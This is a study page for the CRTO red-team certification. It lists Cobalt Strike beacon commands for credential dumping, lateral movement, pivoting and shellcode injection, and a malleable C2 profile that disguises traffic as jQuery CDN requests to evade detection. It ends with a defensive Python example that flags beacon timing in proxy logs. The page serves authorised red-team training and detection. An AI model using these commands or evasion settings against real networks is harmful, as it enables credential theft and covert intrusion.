CRTO
Altered Security

Certified Red Team Operator

Intermediate | 24hr practical exam | Pass: Passing | $399

Red team operations with Cobalt Strike — C2, beacon ops, evasion, persistence.

Issuer: Altered Security
Format: 24hr practical exam
Duration: 48 hours
Pass Score: Passing

Cheat Sheets
Cobalt Strike Operations Guide

Cobalt Strike Beacon Commands

# Host recon
whoami; getuid; getpid; ps; netstat

# File operations
ls; pwd; cd C:\Users; upload /local/file; download C:\file

# Shell execution
shell whoami /all
run ipconfig /all
execute-assembly /path/to/Assembly.exe args

# Credential operations
hashdump
logonpasswords
dcsync domain.local

# Lateral movement
jump psexec64 target payload
jump winrm64 target payload
remote-exec wmi target "cmd /c ..."

# Pivoting
socks 1080
rportfwd 8080 internal 80

# OPSEC-safe injection
shinject PID x64 /path/shellcode.bin
spawnas domain\user password payload

Malleable C2 Profile Tips

# HTTP GET request masquerade as jQuery CDN
http-get {
    set uri "/jquery-3.3.1.min.js";
    client {
        header "Host" "code.jquery.com";
        header "Accept" "text/javascript, application/javascript";
        metadata { base64url; prepend "__cfduid="; header "Cookie"; }
    }
    server {
        header "Content-Type" "application/javascript";
        output { prepend "/*! jQuery v3.3.1"; append "*/"; print; }
    }
}

# Sleep config (avoid sandbox)
set sleeptime "60000";     # 60s
set jitter    "20";        # 20% jitter

# Process injection settings
process-inject {
    set startrwx "false";
    set userwx   "false";
    set min_alloc "16700";
    transform-x86 { prepend "\x90\x90"; }
}

Always set beacon sleep to ≥60s in real engagements. Low sleep values produce frequent check-ins, which network-based EDR detections flag rapidly.
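
Seen from the detection side, the sleep and jitter values in the profile above still leave a timing pattern in proxy logs. The following is an added example, not part of the original cheat sheet: it scores each (source, host, URI) flow by how regular its request intervals are. The log tuples, IP addresses, `intranet.example`, the thresholds and the function names are constructed for illustration, and the sample generator assumes jitter shortens each sleep by up to the configured percentage.

```python
import random
from collections import defaultdict
from statistics import mean, pstdev


def beacon_candidates(events, min_hits=8, max_cv=0.25):
    """events: iterable of (epoch_seconds, src_ip, host, uri) from proxy logs.

    Returns {(src_ip, host, uri): (mean_interval_s, cv)} for flows whose
    inter-arrival times are regular enough to look machine-driven.
    cv is the coefficient of variation (stddev / mean) of the gaps.
    """
    flows = defaultdict(list)
    for ts, src, host, uri in events:
        flows[(src, host, uri)].append(ts)

    hits = {}
    for key, stamps in flows.items():
        if len(stamps) < min_hits:      # too few requests to judge timing
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        cv = pstdev(gaps) / avg
        if cv <= max_cv:                # threshold is an assumption; tune per network
            hits[key] = (round(avg, 1), round(cv, 3))
    return hits


def sample_events(seed=7):
    """Constructed sample: one periodic poller and one human-like browser."""
    rng = random.Random(seed)
    events, t = [], 1_700_000_000.0
    for _ in range(30):                 # 60 s sleep, 20% jitter (assumed to shorten sleep)
        t += 60 * (1 - rng.uniform(0, 0.20))
        events.append((t, "10.0.0.23", "code.jquery.com", "/jquery-3.3.1.min.js"))
    t = 1_700_000_000.0
    for _ in range(30):                 # irregular gaps, 90 s on average
        t += rng.expovariate(1 / 90)
        events.append((t, "10.0.0.57", "intranet.example", "/news"))
    return events


if __name__ == "__main__":
    for flow, (avg, cv) in beacon_candidates(sample_events()).items():
        print(flow, f"mean_gap={avg}s cv={cv}")
```

A real library file requested by a browser is normally fetched once and cached, so a flow that re-requests the same static URI dozens of times at near-constant intervals is worth triage regardless of how legitimate the Host header looks.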